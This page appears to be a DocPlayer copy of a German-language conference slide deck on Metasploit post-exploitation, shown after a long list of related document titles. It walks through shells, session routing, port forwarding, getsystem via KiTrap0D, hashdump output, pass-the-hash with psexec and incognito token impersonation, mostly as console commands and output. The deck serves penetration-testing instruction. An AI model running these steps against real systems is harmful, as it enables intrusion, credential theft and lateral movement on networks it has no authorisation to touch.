Metasploit Framework Unleashed beyond Metasploit

Similar documents
Metasploit Lab: Attacking Windows XP and Linux Targets

Metasploit Beginners

AUTHOR CONTACT DETAILS

Automation of Post-Exploitation

(maybe?)apt1: technical backstage

FORENSIC ARTIFACTS FROM A PASS THE HASH (PTH) ATTACK BY: GERARD LAYGUI

IEEE bg Mode:Monitor Frequency:2.437 GHz Tx-Power=20 dbm

Workshop. From XSS to Domain Admin. Black Hat Sessions 18 juni 2015 Jordy Kersten - Mandy van Oosterhout - Ward Wouts

Exploiting Transparent User Identification Systems

1. LAB SNIFFING LAB ID: 10

CIT 480: Securing Computer Systems. Vulnerability Scanning and Exploitation Frameworks

How to hack a website with Metasploit

Metasploit Unleashed. Class 2: Information Gathering and Vulnerability Scanning. Georgia Weidman Director of Cyberwarface, Reverse Space

Penetration Testing Report Client: Business Solutions June 15 th 2015

The Pen Test Perfect Storm Part 5: We Love Adobe!

Automated Penetration Testing with the Metasploit Framework. NEO Information Security Forum March 19, 2008

The Pen Test Perfect Storm: We Love Microsoft! Pen Test Techniques Part 4

The Pen Test Perfect Storm: Combining Network, Web App, and Wireless Pen Test Techniques Part 2

The Pen Test Perfect Storm: Combining Network, Web App, and Wireless Pen Test Techniques Part 2

Research Paper SAP Penetration Testing Using Metasploit

Mass Pwnage 4 Dummies. Latest pen-testing tricks using Metasploit

Make a folder named Lab3. We will be using Unix redirection commands to create several output files in that folder.

Dumping Windows Password Hashes Using Metasploit

Course Duration: 80Hrs. Course Fee: INR (Certification Lab Exam Cost 2 Attempts)

Lab 12: Mitigation and Deterrent Techniques - Anti-Forensic

NCS 430 Penetration Testing Lab #2 Tuesday, February 10, 2015 John Salamy

Metasploit ing the target machine is a fascinating subject to all security professionals. The rich list of exploit codes and other handy modules of

Savvius Insight Initial Configuration

Vulnerability Assessment and Penetration Testing

TUNNA. A tool designed to bypass firewall restrictions on remote webservers. By: Rodrigo Marcos Nikos Vassakis

Contents Who Should Read this Book... 3 Credits:... 3 Introduction and background... 3 Lab Setup... 3 A primer on windows user privileges...

Pen Test Tips 2. Shell vs. Terminal

Penetration Testing with Kali Linux

60467 Project 1. Net Vulnerabilities scans and attacks. Chun Li

Zen and the Art Of An Internal Penetration Testing Program

Zen and the Art Of An Internal Penetration Testing Program

Kautilya: Teensy beyond shells

Oracle Virtual Desktop Infrastructure. VDI Demo (Microsoft Remote Desktop Services) for Version 3.2

Hands On Activities: TCP/IP Network Monitoring and Management

DCOM settings for computer-to-computer communication between OPC servers and OPC clients

Penetration Testing Walkthrough

Broadband Router ESG-103. User s Guide

How to Configure an Initial Installation of the VMware ESXi Hypervisor

Network Penetration Testing and Ethical Hacking Scanning/Penetration Testing. SANS Security Sans Mentor: Daryl Fallin

ReadyNAS Remote Troubleshooting Guide NETGEAR

OroTimesheet 7 Installation Guide

Configuration Network Management Card-2

Lab 7: Introduction to Pen Testing (NMAP)

Deployment Guide Oracle Siebel CRM

Requirements Collax Security Gateway Collax Business Server or Collax Platform Server including Collax SSL VPN module

Vantage RADIUS 50. Quick Start Guide Version 1.0 3/2005

School of Information Science (IS 2935 Introduction to Computer Security, 2003)

IDS and Penetration Testing Lab II

Using Remote Desktop Software with the LAN-Cell 3

Nagios XI Monitoring Windows Using WMI

Abusing JBoss. Christian Papathanasiou. April 1 st, 2010

PuttyRider. With great power comes great responsibility. # Pivoting from Windows to Linux in a penetration test. Adrian Furtunã, PhD adif2k8@gmail.

Lab 10: Security Testing Linux Server

CSSIA CompTIA Security+ Domain. Network Security. Network Security. Network Security. Network Security. Network Security

Post Exploitation. n00bpentesting.com

Basic Security Testing with Kali Linux

CONNECTING TO DEPARTMENT OF COMPUTER SCIENCE SERVERS BOTH FROM ON AND OFF CAMPUS USING TUNNELING, PuTTY, AND VNC Client Utilities

GlobalSCAPE DMZ Gateway, v1. User Guide

PT Activity 8.1.2: Network Discovery and Documentation Topology Diagram

Advanced SQL injection to operating system full control

Dragonframe License Manager User Guide Version 1.2.2

Kerio Connect. Kerio 4D Migration. Kerio Technologies

SAIP 2012 Performance Engineering

The Metasploit. Framework

ecopy ShareScan v4.3 Pre-Installation Checklist

WS_FTP Server. User Guide

Yale Software Library

Password Reset PRO INSTALLATION GUIDE

50.XXX is based on your station number

Virtual Learning Tools in Cyber Security Education

APPLE PUSH NOTIFICATION IN EMC DOCUMENTUM MOBILE APPLICATION

Cisco VPN Concentrator Implementation Guide

This chapter describes how to set up and manage VPN service in Mac OS X Server.

Getting Started with Clearlogin A Guide for Administrators V1.01

LDaemon. This document is provided as a step by step procedure for setting up LDaemon and common LDaemon clients.

Installation Notes for Outpost Network Security (ONS) version 3.2

REMOTE ACCESS DDNS CONFIGURATION MANUAL

PineApp Archive-Secure Quick Installation Guide:

NOC PS manual. Copyright Maxnet All rights reserved. Page 1/45 NOC-PS Manuel EN version 1.3

Quick Start Guide for VMware and Windows 7

NetBoot/SUS Server User Guide. Version 2.0

Lab 7 - Exploitation 1. NCS 430 Penetration Testing Lab 7 Sunday, March 29, 2015 John Salamy

Remote Desktop Administration

TECHNICAL NOTE. Technical Note P/N REV 03. EMC NetWorker Simplifying firewall port requirements with NSR tunnel Release 8.

MIEIC - SSIN (Computer Security)

TECHNICAL SUPPORT GUIDE

Author: Sumedt Jitpukdebodin. Organization: ACIS i-secure. ID: My Blog:

ClusterLoad ESX Virtual Appliance quick start guide v6.3

IBM Security QRadar Version WinCollect User Guide V7.2.2

Transcription:

Metasploit Framework Unleashed beyond Metasploit

<< Content << Shells upgraden Pivoting Routing Port forwarding Meterpreter Scripte checkvm/get_env/getvncpw/vnc/winenum Password fu Teil 2 Hashdump Pass the Hash incognito

<< Shells << Exploit der nicht in MSF integriert ist Plain Text Shell root@bt:~# nc -v 10.8.28.16 4444 localhost [10.8.28.16] 4444 (?) open Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\> <STRG>+<C> root@bt:~# nc -v 10.8.28.16 4444 localhost [10.8.28.16] 4444 (?) : Connection refused UPS you lose

<< Shells << MSF Bind Payload MSF Multi handler: msf > set PAYLOAD windows/shell_bind_tcp msf exploit(handler) > set RPORT 4444 msf exploit(handler) > set RHOST 10.8.28.xx sessions v sessions u X: msf exploit(handler) > setg LPORT 3333 msf exploit(handler) > setg LHOST 10.8.28.xx msf exploit(handler) > sessions -u 1

<< Portfun << Routen setzen meterpreter > ipconfig VMware Accelerated AMD PCNet Adapter Hardware MAC: 00:0c:29:50:60:7e IP Address : 10.8.28.212 Netmask : 255.255.255.0 Intel(R) PRO/1000 MT-Netzwerkverbindung Hardware MAC: 00:0c:29:50:60:88 IP Address : 192.168.111.1 Netmask : 255.255.255.0

<< Portfun << Routen setzen msf > route Usage: route [add/remove/get/flush/print] subnet netmask [comm/sid] msf > route add 191.168.111.0 255.255.255.0 5 msf > route print Active Routing Table ==================== Subnet Netmask Gateway ------ ------- ------- 191.168.111.0 255.255.255.0 Session 5

<< Portfun << Routen setzen msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp msf exploit(ms08_067_netapi) > exploit [*] Meterpreter session 3 opened (10.8.28.9-10.8.28.212:0 -> 192.168.111.11:987)

<< Portfun << Routen setzen msf > load auto_add_route [*] Successfully loaded plugin: auto_add_route [*] Meterpreter session 1 opened ( ) [*] AutoAddRoute: Routing new subnet 10.8.28.0/255.255.255.0 through session 1 [*] AutoAddRoute: Routing new subnet 192.168.111.0/255.255.255.0 through session 1 msf exploit(mssql_payload) > route print Subnet Netmask Gateway ------ ------- ------- 10.8.28.0 255.255.255.0 Session 1 192.168.111.0 255.255.255.0 Session 1

<< Portfun << Portforwarding meterpreter > portfwd -h Usage: portfwd [-h] [add / delete / list] [args] OPTIONS: -L <opt> The local host to listen on (optional). -h Help banner. -l <opt> The local port to listen on. -p <opt> The remote port to connect to. -r <opt> The remote host to connect to.

<< Portfun << Portforwarding meterpreter > portfwd add -L 10.8.28.9 -l 3389 -p 3389 -r 192.168.111.50 [*] Local TCP relay created: 10.8.28.9:3389 <-> 192.168.111.50:3389 meterpreter > portfwd list 0: 10.8.28.9:3389 -> 192.168.111.50:3389 1 total local port forwards. root@bt:~# netstat -anp grep 3389 tcp 0 0 10.8.28.9:3389 0.0.0.0:* LISTEN 11351/ruby

<< Portfun <<

<< Extensions << Root is just the beginning meterpreter > getuid Server username: WINDOWS_XP\bob meterpreter > use priv Loading extension priv...success. meterpreter > getsystem h 1 : Service - Named Pipe Impersonation (In Memory/Admin) 2 : Service - Named Pipe Impersonation (Dropper/Admin) 3 : Service - Token Duplication (In Memory/Admin) 4 : Exploit - KiTrap0D (In Memory/User) meterpreter > getsystem...got system (via technique 4). meterpreter > getuid Server username: NT-AUTORITÄT\SYSTEM

<< Scripte << Root is just the beginning meterpreter > run run checkvm run keylogrecorder run remotewinenum run credcollect run killav run scheduleme run domain_list_gen run kitrap0d run schtasksabuse run dumplinks run metsvc run scraper run get_env run migrate run screen_unlock run get_local_subnets run multi_console_command run search_dwld run get_pidgin_creds run multicommand run srt_webdrive_priv run getcountermeasure run multiscript run uploadexec run getgui run netenum run virtualbox_sysenter_dos run gettelnet run packetrecorder run vnc run getvncpw run persistence run winbf run hashdump run pml_driver_config run winenum run hostsedit run prefetchtool run wmic

<< Password fu << Root is just the beginning meterpreter > run hashdump Administrator:500:b2e74449aaaf75681bf3ece46b279e12:303562b5b0298f6 0605347029a9ee2e2::: msf exploit(psexec) > exploit [*] Started reverse handler on 10.8.28.9:2223 [*] Connecting to the server... [*] Authenticating as user 'Administrator'... [*] Sending stage (748032 bytes) to 10.8.28.201 [*] Meterpreter session 4 opened (10.8.28.9:2223 -> 10.8.28.201:49159) at Sat Aug 07 22:30:38 +0200 2010 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM

<< Password fu << Root is just the beginning meterpreter > use incognito meterpreter > help Incognito Commands ================== Command Description ------- ----------- impersonate_token Impersonate specified token list_tokens List tokens available under current user context

<< Password fu << Root is just the beginning meterpreter > list_tokens -u Delegation Tokens Available ======================================== INTEGRALISHACKM\Administrator meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > impersonate_token INTEGRALISHACKM\\Administrator [+] Delegation token available [+] Successfully impersonated user INTEGRALISHACKM\Administrator meterpreter > getuid Server username: INTEGRALISHACKM\Administrator

<< thx << Contact: michael.messner@integralis.com http://www.s3cur1ty.de http://www.back-track.de http://www.metasploit.eu

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information